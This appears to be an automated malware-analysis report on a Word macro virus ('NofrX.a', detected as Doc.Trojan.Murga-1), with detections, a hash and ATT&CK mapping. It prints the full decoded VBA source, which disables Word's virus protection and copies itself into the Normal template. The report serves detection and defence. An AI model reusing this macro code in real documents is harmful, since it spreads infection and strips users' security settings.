MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros that attempt to disable virus protection and save a component named 'nofrx' to 'c:\sys.sys'. This component is then imported into the Normal template, suggesting an attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Murga-1' and the embedded artifact signature 'Win.Trojan.C-286' further indicate malicious intent.
Heuristics (2)
- ClamAV: Doc.Trojan.Murga-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Murga-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1137 bytes |

SHA-256: 38d2484f5fe1d2d5776509028ef7e9518ac484b9373a1a9ee79bd98799f26f06
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FilePrint()
' NofrX.a by e[ax] ´98
' Special greetinz goes to -=PU=-
On Error GoTo kraj
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
If (Month(Now) = 7) And (Day(Now) = 7) Then
MsgBox ("Danas je rodjendan Murga-drotu!!!! Ohoooooo!"), vbInformation
ActiveDocument.VBProject.VBComponents.Item("nofrx").Export ("c:\sys.sys")
NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
If NormalTemplate.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
End If
If ActiveDocument.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
ActiveDocument.VBProject.VBComponents.Import ("c:\sys.sys")
End If
End If
kraj:
End Sub